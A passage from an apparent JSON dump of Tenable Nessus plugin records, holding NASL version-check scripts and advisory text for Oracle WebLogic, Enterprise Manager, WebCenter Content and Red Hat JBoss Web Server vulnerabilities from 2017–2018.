NULL;\n\nif (version =~ \"^11\\.1\\.2\\.3(\\.|$)\")\n fixed = '11.1.2.3.180111';\n\nif (!isnull(fixed))\n{\n if (ver_compare(ver:version, fix:fixed, strict:FALSE) < 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n }\n}\n\nif (isnull(report)) audit(AUDIT_INST_PATH_NOT_VULN, product, version, path);\n\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:00", "description": "The version of WebLogic Server installed on the remote host is affected by multiple vulnerabilities as referenced in the January 2018 CPU advisory, as follows:\n\n - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). The supported version that is affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data.\n (CVE-2017-10352)\n\n - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebLogic Server accessible data. (CVE-2018-2625)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-12-16T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (Jan 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10352", "CVE-2018-2625"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/144326", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144326);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-10352\", \"CVE-2018-2625\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (Jan 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of WebLogic Server installed on the remote host is affected by multiple vulnerabilities as referenced in\nthe January 2018 CPU advisory, as follows:\n\n - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web\n Services). The supported version that is affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and\n 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP\n to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may\n significantly impact additional products. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic\n Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server\n accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data.\n (CVE-2017-10352)\n\n - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web\n Services). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.2.0. Easily\n exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise\n Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized read access to\n a subset of Oracle WebLogic Server accessible data. (CVE-2018-2625)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujan2018.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('install_func.inc');\n\napp_name = 'Oracle WebLogic Server';\n\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os))\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n}\nelse port = 0;\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nversion = install['version'];\n\nfix = NULL;\nfix_ver = NULL;\n\nif (version =~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n fix_ver = '12.2.1.3.180116';\n fix = make_list('27438258');\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = '12.2.1.2.180116';\n fix = make_list('26860993');\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = '12.1.3.0.180116';\n fix = make_list('27057030');\n}\n\nif (isnull(fix_ver) || ver_compare(ver:version, fix:fix_ver, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, install['path']);\n\nelse {\n report =\n '\\n Oracle Home : ' + install['Oracle Home'] +\n '\\n Install path : ' + install['path'] +\n '\\n Version : ' + version +\n '\\n Fixes : ' + join(sep:', ', fix);\n security_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:11", "description": "The version of Oracle Enterprise Manager Cloud Control installed on the remote host is affected by multiple vulnerabilities in the Enterprise Manager Base Platform component.", "cvss3": {}, "published": "2018-07-20T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Cloud Control Multiple Vulnerabilities (July 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645", "CVE-2017-9798"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager"], "id": "ORACLE_ENTERPRISE_MANAGER_JUL_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/111152", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111152);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5645\", \"CVE-2017-9798\");\n script_bugtraq_id(97702, 100872);\n script_xref(name:\"IAVA\", value:\"2020-A-0326\");\n\n script_name(english:\"Oracle Enterprise Manager Cloud Control Multiple Vulnerabilities (July 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An enterprise management application installed on the remote host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Enterprise Manager Cloud Control installed on\nthe remote host is affected by multiple vulnerabilities in the\nEnterprise Manager Base Platform component.\");\n # https://support.oracle.com/rs?type=doc&id=2394520.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?19cc26a6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2018 Oracle Critical\nPatch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5645\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Cloud Control\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"oracle_rdbms_cpu_func.inc\");\ninclude(\"install_func.inc\");\n\nproduct = \"Oracle Enterprise Manager Cloud Control\";\ninstall = get_single_install(app_name:product, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nemchome = install['path'];\n\npatchid = NULL;\nmissing = NULL;\npatched = FALSE;\nfix = NULL;\n\nif (version =~ \"^13\\.2\\.0\\.0(\\.[0-9]+)?$\")\n{\n patchid = \"28161815\";\n fix = \"13.2.0.0.180717\";\n}\nelse if (version =~ \"^12\\.1\\.0\\.5(\\.[0-9]+)?$\")\n{\n patchid = \"28026487\";\n fix = \"12.1.0.5.180717\";\n}\n\nif (isnull(patchid))\n audit(AUDIT_HOST_NOT, 'affected');\n\n# compare version to check if we've already adjusted for patch level during detection\nif (ver_compare(ver:version, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, product, version, emchome);\n\n# Now look for the affected components\npatchesinstalled = find_patches_in_ohomes(ohomes:make_list(emchome));\nif (isnull(patchesinstalled))\n missing = patchid;\nelse\n{\n foreach applied (keys(patchesinstalled[emchome]))\n {\n if (applied == patchid)\n {\n patched = TRUE;\n break;\n }\n else\n {\n foreach bugid (patchesinstalled[emchome][applied]['bugs'])\n {\n if (bugid == patchid)\n {\n patched = TRUE;\n break;\n }\n }\n if (patched) break;\n }\n }\n if (!patched)\n missing = patchid;\n}\n\nif (empty_or_null(missing))\n audit(AUDIT_HOST_NOT, 'affected');\n\norder = make_list('Product', 'Version', \"Missing patch\");\nreport = make_array(\n order[0], product,\n order[1], version,\n order[2], patchid\n);\nreport = report_items_str(report_items:report, ordered_fields:order);\n\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:21", "description": "The version of Oracle WebCenter Content running on the remote host is affected by multiple vulnerabilities.", "cvss3": {}, "published": "2018-03-01T00:00:00", "type": "nessus", "title": "Oracle WebCenter Content Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-2564", "CVE-2018-2596", "CVE-2018-2716"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBCENTER_CONTENT_JAN_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/107090", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107090);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-2564\", \"CVE-2018-2596\", \"CVE-2018-2716\");\n script_bugtraq_id(102541, 102545, 102672);\n\n script_name(english:\"Oracle WebCenter Content Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebCenter Content running on the remote host is\naffected by multiple vulnerabilities.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6072c657\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/01\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"oracle_webcenter_content_detect.nasl\");\n script_require_keys(\"installed_sw/Oracle WebCenter Content\", \"Settings/ParanoidReport\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"Oracle WebCenter Content\";\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(app_name:appname, port:port, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\ndir = install['path'];\n\ninstall_url = build_url(port: port, qs:dir);\n\nmatches = pregmatch(string:version, pattern:\"([0-9.]+) \$([0-9.]+)\$\");\nif (empty_or_null(matches)) audit(AUDIT_VER_FORMAT, version);\nmain_ver = matches[1];\nsub_ver = matches[2];\nbuild = int(sub_ver);\nfixed_build = 0;\n\nreport = '';\n\nif (main_ver == \"12.2.1.3.0\")\n{\n # Patch 27042584\n # 12.2.1.3.0 (158565)\n fixed_build = 158565;;\n patch = 27042584;\n}\nelse if (main_ver == \"12.2.1.2.0\")\n{\n # Patch 27116621\n # 12.2.1.2.0 (158156)\n fixed_build = 158156;\n patch = 27116621;\n}\nelse if (main_ver == \"11.1.1.9.0\")\n{\n # Patch 27042562\n # 11.1.1.9.0 (171120)\n fixed_build = 171120;\n patch = 27042562;\n}\nif (build < fixed_build)\n{\n report = '\\n Installed version : ' + main_ver + ' (' + sub_ver + ')' +\n '\\n Fixed version : ' + main_ver + ' (' + fixed_build + ')' +\n '\\n Required patch : ' + patch + '\\n';\n}\n\nif (report == '') audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, version);\nelse security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:27", "description": "An update is now available for Red Hat JBoss Enterprise Web Server 2.1.2 for RHEL 6 and Red Hat JBoss Enterprise Web Server 2.1.2 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nThis release provides an update to httpd, OpenSSL and Tomcat 6/7 for Red Hat JBoss Web Server 2.1.2. The updates are documented in the Release Notes document linked to in the References.\n\nThis release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves as a update for Red Hat JBoss Web Server 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nUsers of Red Hat JBoss Web Server 2 should upgrade to these updated packages, which resolve several security issues.\n\nSecurity Fix(es) :\n\n* It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12615)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12617)\n\n* A flaw was found in the way the DES/3DES cipher was used as part of the TLS /SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank OpenVPN for reporting CVE-2016-2183 and Hanno Bock for reporting CVE-2017-9798. Upstream acknowledges Karthikeyan Bhargavan (Inria) and Gaetan Leurent (Inria) as the original reporters of CVE-2016-2183.\n\nBug Fix(es) :\n\n* Corruption in nodestatsmem in multiple core dumps but in different functions of each core dump. (BZ#1338640)\n\n* mod_cluster segfaults in process_info() due to wrongly generated assembler instruction movslq (BZ#1448709)\n\n* CRL checking of very large CRLs fails with OpenSSL 1.0.2 (BZ#1493075)", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : Red Hat JBoss Web Server (RHSA-2017:3113) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2183", "CVE-2017-12615", "CVE-2017-12617", "CVE-2017-9788", "CVE-2017-9798"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-static", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native-debuginfo", "p-cpe:/a:redhat:enterprise_linux:mod_ldap", "p-cpe:/a:redhat:enterprise_linux:mod_ldap22", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "p-cpe:/a:redhat:enterprise_linux:mod_ssl22", "p-cpe:/a:redhat:enterprise_linux:tomcat6", "p-cpe:/a:redhat:enterprise_linux:tomcat6-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat6-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:tomcat6-el-2.1-api", "p-cpe:/a:redhat:enterprise_linux:tomcat6-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat6-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:tomcat6-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat6-log4j", "p-cpe:/a:redhat:enterprise_linux:tomcat6-maven-devel", "p-cpe:/a:redhat:enterprise_linux:tomcat6-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:tomcat6-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat7", "p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j", "p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "p-cpe:/a:redhat:enterprise_linux:httpd22", "p-cpe:/a:redhat:enterprise_linux:httpd22-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd22-devel", "p-cpe:/a:redhat:enterprise_linux:httpd22-manual", "p-cpe:/a:redhat:enterprise_linux:httpd22-tools", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-debuginfo", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-devel", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-libs", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-perl", "p-cpe:/a:redhat:enterprise_linux:tomcat7-maven-devel", "p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2017-3113.NASL", "href": "https://www.tenable.com/plugins/nessus/104456", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:3113. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104456);\n script_version(\"3.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2016-2183\",\n \"CVE-2017-12615\",\n \"CVE-2017-12617\",\n \"CVE-2017-9788\",\n \"CVE-2017-9798\"\n );\n script_xref(name:\"RHSA\", value:\"2017:3113\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"RHEL 6 / 7 : Red Hat JBoss Web Server (RHSA-2017:3113) (Optionsbleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update is now available for Red Hat JBoss Enterprise Web Server\n2.1.2 for RHEL 6 and Red Hat JBoss Enterprise Web Server 2.1.2 for\nRHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL)\nand Transport Layer Security (TLS) protocols, as well as a\nfull-strength general-purpose cryptography library.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nThis release provides an update to httpd, OpenSSL and Tomcat 6/7 for\nRed Hat JBoss Web Server 2.1.2. The updates are documented in the\nRelease Notes document linked to in the References.\n\nThis release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves\nas a update for Red Hat JBoss Web Server 2, and includes bug fixes,\nwhich are documented in the Release Notes document linked to in the\nReferences.\n\nUsers of Red Hat JBoss Web Server 2 should upgrade to these updated\npackages, which resolve several security issues.\n\nSecurity Fix(es) :\n\n* It was discovered that the httpd's mod_auth_digest module did not\nproperly initialize memory before using it when processing certain\nheaders related to digest authentication. A remote attacker could\npossibly use this flaw to disclose potentially sensitive information\nor cause httpd child process to crash by sending specially crafted\nrequests to a server. (CVE-2017-9788)\n\n* A vulnerability was discovered in Tomcat where if a servlet context\nwas configured with readonly=false and HTTP PUT requests were allowed,\nan attacker could upload a JSP file to that context and achieve code\nexecution. (CVE-2017-12615)\n\n* A vulnerability was discovered in Tomcat where if a servlet context\nwas configured with readonly=false and HTTP PUT requests were allowed,\nan attacker could upload a JSP file to that context and achieve code\nexecution. (CVE-2017-12617)\n\n* A flaw was found in the way the DES/3DES cipher was used as part of\nthe TLS /SSL protocol. A man-in-the-middle attacker could use this\nflaw to recover some plaintext data by capturing large amounts of\nencrypted traffic between TLS/SSL server and client if the\ncommunication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\n* A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive\nused in an .htaccess file. A remote attacker could possibly use this\nflaw to disclose portions of the server memory, or cause httpd child\nprocess to crash. (CVE-2017-9798)\n\nRed Hat would like to thank OpenVPN for reporting CVE-2016-2183 and\nHanno Bock for reporting CVE-2017-9798. Upstream acknowledges\nKarthikeyan Bhargavan (Inria) and Gaetan Leurent (Inria) as the\noriginal reporters of CVE-2016-2183.\n\nBug Fix(es) :\n\n* Corruption in nodestatsmem in multiple core dumps but in different\nfunctions of each core dump. (BZ#1338640)\n\n* mod_cluster segfaults in process_info() due to wrongly generated\nassembler instruction movslq (BZ#1448709)\n\n* CRL checking of very large CRLs fails with OpenSSL 1.0.2\n(BZ#1493075)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/3227901\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017:3113\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-2183\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-12615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-12617\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-9788\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-9798\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12617\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2017-9788\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/01\");\n 